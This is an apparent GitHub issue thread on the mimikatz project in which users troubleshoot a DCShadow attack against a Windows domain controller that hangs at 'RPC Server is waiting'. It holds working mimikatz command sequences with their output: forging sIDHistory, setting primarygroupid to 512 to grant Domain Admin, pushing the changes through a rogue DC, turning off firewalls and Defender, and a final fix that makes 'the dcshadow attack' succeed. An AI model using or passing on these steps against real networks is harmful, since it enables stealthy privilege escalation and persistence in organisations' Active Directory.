mimikatz
mimikatz copied to clipboard
gentilkiwi
dcshadow ..rpc server is waiting
Hello, actually i find this issue when running dcshadow over a domain controller windows 2008r2: using the latest version of program:
mimikatz # version /full
mimikatz 2.2.0 (arch x64) Windows NT 10.0 build 18898 (arch x64) msvc 191627034 0
lsasrv.dll : 10.0.18898.1000 msv1_0.dll : 10.0.18898.1000 tspkg.dll : 10.0.18898.1000 wdigest.dll : 10.0.18898.1000 kerberos.dll : 10.0.18898.1000 dpapisrv.dll : 10.0.18898.1000 cryptdll.dll : 10.0.18898.1000 samsrv.dll : 10.0.18898.1000 rsaenh.dll : 10.0.18898.1000 ncrypt.dll : 10.0.18898.1000 ncryptprov.dll : 10.0.18898.1000 wevtsvc.dll : 10.0.18898.1000 termsrv.dll : 10.0.18898.1000
I use 1 mimikatz as SYSTEM account (process::runp) where i set the change I want to apply:
mimikatz # lsadump::dcshadow /object:xxxxx /attribute:sIDHistory /value:S-1-5-21-123455464-12314568901-3331114691-20803 ** Domain Info **
Domain: DC=test,DC=local Configuration: CN=Configuration,DC=test,DC=local Schema: CN=Schema,CN=Configuration,DC=test,DC=local dsServiceName: ,CN=Servers,CN=Monza,CN=Sites,CN=Configuration,DC=test,DC=local domainControllerFunctionality: 4 ( WIN2008R2 ) highestCommittedUSN: 12758710
** Server Info **
Server: DHCP01.test.local InstanceId : {59e08b06-0af3-49c2-a0f8-9ff1158e4205} InvocationId: {2caf9b84-a3ac-4508-94da-9f08fd661ba9} Fake Server (not already registered): BIT02404.test.local
** Attributes checking **
#0: sIDHistory
** Objects **
#0: l.grembo DN:CN=xxxxx,OU=Tecnici,OU=Monza,DC=test,DC=local sIDHistory (1.2.840.113556.1.4.609-90261 rev 1): S-1-5-21-3039643774-2920745930-236334691-20803 (0105000000000005150000007e482db5ca0b17ae632e160e43510000)
** Starting server **
BindString[0]: ncacn_ip_tcp:BIT02404[63259] RPC bind registered RPC Server is waiting! == Press Control+C to stop ==
then with a domain admins account I use the mimikatz and doing:
mimikatz # lsadump::dcshadow /push /dc:dhcp01.test.local ** Domain Info **
Domain: DC=test,DC=local Configuration: CN=Configuration,DC=test,DC=local Schema: CN=Schema,CN=Configuration,DC=test,DC=local dsServiceName: ,CN=Servers,CN=Monza,CN=Sites,CN=Configuration,DC=test,DC=local domainControllerFunctionality: 4 ( WIN2008R2 ) highestCommittedUSN: 12758718
** Server Info **
Server: dhcp01.test.local InstanceId : {59e08b06-0af3-49c2-a0f8-9ff1158e4205} InvocationId: {2caf9b84-a3ac-4508-94da-9f08fd661ba9} Fake Server (not already registered): BIT02404.test.local
** Performing Registration **
** Performing Push **
Syncing DC=test,DC=local Sync Done
** Performing Unregistration **
problem is to the mimikatz with SYSTEM account I don't see the replication ending well but i keep seeing this:
** Starting server **
BindString[0]: ncacn_ip_tcp:BIT02404[63259] RPC bind registered RPC Server is waiting! == Press Control+C to stop ==
basically is waiting forever until I did Control+C
i have checked on both server/workstation that RPC traffic is allowed, even with no firewall enabled I can keep seeing the RPC server is waiting
any ideas why that happen ? I never had problem pushing attribute with dcshadow but this time
appreciate thanks
Hello, this problem should be a firewall problem, there is no open RPC port, you can try to close the firewall!
hello, thanks for the reply. sadly I have been disabled the windows firewall from both sides, dc and client but still getting the same issue, rpc Is hanging on .. until I press ctrl+c
I got same issue with Defender disabled and Firewall Off both PC and DC. Win10 and WS2016
禁用Defender并关闭PC和DC的防火墙时,我遇到了同样的问题。 Win10和WS2016
You can try turning off the firewalls of the DC and the domain host. Then on a normal domain control host (you don't need to log in to the domain account), you need two command line windows with different permissions, local system permission A and domain administrator permission B. Execute the DCShadow command on A and push on B. A window: mimikatz # token::whoami
Process Token : {0;000003e7} 1 D 1390653 NT AUTHORITY\SYSTEM S-1-5-18 (04g,31p) Primary Thread Token : no token B window: mimikatz # token::whoami Process Token : {0;004a5b1f} 1 L 4951318 TONY\attack S-1-5-21-..... (14g,05p) Primary Thread Token : no token
禁用Defender并关闭PC和DC的防火墙时,我遇到了同样的问题。 Win10和WS2016
You can try turning off the firewalls of the DC and the domain host. Then on a normal domain control host (you don't need to log in to the domain account), you need two command line windows with different permissions, local system permission A and domain administrator permission B. Execute the DCShadow command on A and push on B. A window: mimikatz # token::whoami
Process Token : {0;000003e7} 1 D 1390653 NT AUTHORITY\SYSTEM S-1-5-18 (04g,31p) Primary Thread Token : no token B window: mimikatz # token::whoami Process Token : {0;004a5b1f} 1 L 4951318 TONY\attack S-1-5-21-..... (14g,05p) Primary Thread Token : no token
This is what I want to execute, add test to admin A window: mimikatz # lsadump::dcshadow /object:CN=dc,CN=Users,DC=tony,DC=local /attribute:primarygroupid /value:512 B window: mimikatz # lsadump::dcshadow /push
Thank you very much for reply.
I did that...
disable firewall of both PC and DC
"netsh advfirewall show allprofiles" shows OFF on every profiles on both side(PC and DC)
Logon to PC with domain user then run cmd with domain admin and run...
A Window with Domain Admin
psexec -i -s cmd (whoami returns "nt authority\system") run mimikatz on that window token::whoami returns NT AUTHORITY\SYSTEM lsadump::dcshadow /object:CN=Administrator,CN=Users,DC=root,DC=domain /Attribute:description /Value:Hello. (with no error)
B Window with Domain Admin
run mimikatz on new cmd with Domain Admin priv token::whoami returns domain\domain user lsadump::dcshadow /push (with no error)
But still A was waiting...
I tried "!process token" on A Window, but still doesn't work.
Any hints welcome...
Finally I got it. Just installed English version both PC and WS. Works like a charm.
@zerocool225 how did you do it? I am facing the same problem and can't solve it!
@zerocool225 Same problem here, how did you managed to solve it? firewall is turned off on all stations.
@johnjohnsp1 I met same problem. Finally I find out the DC(in your situation is DHCP01.test.local) cann't resolve the fake server name(BIT02404.test.local). So I add fake server name resolution into DC's host file and then dcshadow attack successed. Hoped this can help you.
